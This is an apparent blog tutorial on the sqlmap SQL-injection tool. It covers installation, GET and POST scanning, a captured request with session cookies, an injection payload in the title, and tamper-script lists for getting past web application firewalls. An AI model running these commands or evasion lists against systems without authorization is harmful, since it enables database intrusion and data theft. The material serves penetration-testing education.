SQLmap Commands: A Tutorial on SQLmap With Examples (Updated 2019)

Select * from table where read_post = '' or 1=1--'

Introduction & Pre-requisite

SQLmap is an automated penetration testing tool for SQL injection which tops the OWASP-2017-A1 list. It is a different from Cross-Site Request Forgery.

In this post, you will learn more about the different types of sqlmap commands and switches.

The downloading and installing of sqlmap is pretty straightforward.

If you are using Kali Linux or any other popular linux distribution, Git is already pre-installed and you can skip the next step.

Type the following command to install Git if it is not installed.

sudo apt-get install git

With git installed, you can clone the latest version of sqlmap by entering the following command. This will automatically download all the files in the sqlmap project.

git clone https://github.com/sqlmapproject/sqlmap.git

Usage & Examples

1) GET Request

This method is most commonly used where the parameters are in the URL.

python sqlmap -u "https://target.com/index.php?name=abc*&lastname=def"

The switches used in the above sqlmap command are:

-u = URL

* = specifies which parameter to scan (name in this case)

2) POST Request

For POST request, the parameters are located in the body section of an HTTP request and therefore, additional steps are required before sqlmap is able to detect and test the parameters for vulnerability.

2.1) Parsing using BurpSuite

Step 1: Intercept the post request using BurpSuite

Step 2: Right-click on the panel and click on “Copy to file”

Step 3: Parse the text file into BurpSuite using the -r switch

An example of the command is as follow:

python sqlmap -r /file.txt -p "def" --dbs --threads 5

The switches used in the above sqlmap command are:

-r = Request file

-p = Parameter

–dbs = Enumerate database

–threads = Number of threads running

An example of a post request:

POST /bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/saveMailGroups HTTP/1.1
Host: 127.0.0.1
Proxy-Connection: keep-alive
Content-Length: 523
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/bedita-3.5.0.corylus.2261e29/bedita/index.php/newsletter/viewMailGroup/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

data[MailGroup][id]=&data[MailGroup][group_name]=&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user],

your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user],

you+have+been+unsubscribed+from "[$title]"

2.2) Parsing directly into SQLMap

Step 1: Intercept the post request using BurpSuite

Step 2: Run the following sqlmap command:

python sqlmap –u "https://target.com/index.php" --cookies= --data=

Using the example POST request above, the contents going into the –cookies switch should be:

Cookie: CAKEPHP=me57vjaqc2ts154qr342a6u6i2; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_sortsel=field_name; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_ordersel=ASC; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_limitsel=15; /impresscms_1.3.7_final/htdocs/modules/profile/admin/field.php_mod_profile_Field_filtersel=default; flash=yes; PHPSESSID=tg14v79ionj9d7lpelap300p33; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; _ga=GA1.1.621011711.1425057132

Next, the contents going into the data section should be:

data[MailGroup][id]=&data[MailGroup][group_name]=&data[MailGroup][area_id]=1&data[MailGroup][visible]=1&data[MailGroup][security]=none&data[MailGroup][confirmation_in_message]=Hi [$user],

your+subscription+is+now+active,+soon+you'll+receive+the "[$title]"+newsletter.&data[MailGroup][confirmation_out_message]=Hi [$user],

you+have+been+unsubscribed+from "[$title]"

Miscellaneous sqlmap commands

Using the above methods, you should be able to test in most scenarios. However, there are also some other switches which may be useful.

Here are some useful sqlmap commands:

python sqlmap -u "https://target.com/index.php?name=abc" --threads=10
python sqlmap -u "https://target.com/index.php?name=abc" -v 3
python sqlmap -u "https://target.com/index.php?name=abc" --batch
python sqlmap -u "https://target.com/index.php?name=abc" --risk=3 --level=5
python sqlmap -u "https://target.com/index.php?name=abc" --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N"
python sqlmap -u "https://target.com/index.php" --crawl=5 --crawl-exclude="logout" --forms
python sqlmap -u 'https://target.com/index.php?name=abc’ --tamper=apostrophemask,apostrophenullencode

For general usage:

tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes

MSSQL:

tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

MySQL:

tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

These are some examples that should be sufficient to get you started. There are also other switches that can be found by visiting sqlmap’s Github page or by entering:

python sqlmap -hh

Want to continue a scan after exiting SSH? You can read more at my tmux tutorial.